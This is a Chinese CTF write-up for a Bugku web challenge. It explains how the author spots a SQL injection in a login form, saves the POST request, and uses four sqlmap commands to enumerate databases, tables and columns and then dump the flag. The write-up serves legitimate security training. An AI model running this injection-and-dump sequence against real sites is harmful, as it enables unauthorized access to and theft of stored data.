bugku_web_这是一个神奇的登录界面

首先,通过这个URL:http://120.24.86.145:9001/sql/

和这个风骚的界面,很明显的SQL注入题目

 

然后打开源代码看看:

 

action居然没有目标脚本???

这基本上可以验证就是使用sql注入了

既然是sql注入,那就要用到注入神器sqlmap了!

不过,因为这是post方法,所以我们只能使用-r + 请求头的方式

  接下来是保存请求头

  首先打开火狐代理:

  

  //无关紧要的小技巧:最好在输入框里输入好用户名和密码之后再点提交

  

  //无关紧要的注意点:一定要把里面的内容全选(Ctrl+A)再copy to file

  我又把保存好的文件拖到了kali攻击机上,路径是:/zzz/1.txt

接下来素质四连它:

//以下命令在kali 2.0中运行正常

1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs

-r + 路径是以只读方式打开 -p + admin_name是选取admin_name为注入点(injection point) --dbs是爆破数据库名

2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables

--tables 是爆列表名

3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

--columns是爆列名

4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

--dump是爆字段

??我不明白的是,为什么爆字段的时候,不需要输入y/n而是不停的回车就行了呢?这两种操作究竟有什么不同呢?

最后得到flag

 

转载于:https://www.cnblogs.com/huangming-zzz/p/9726906.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值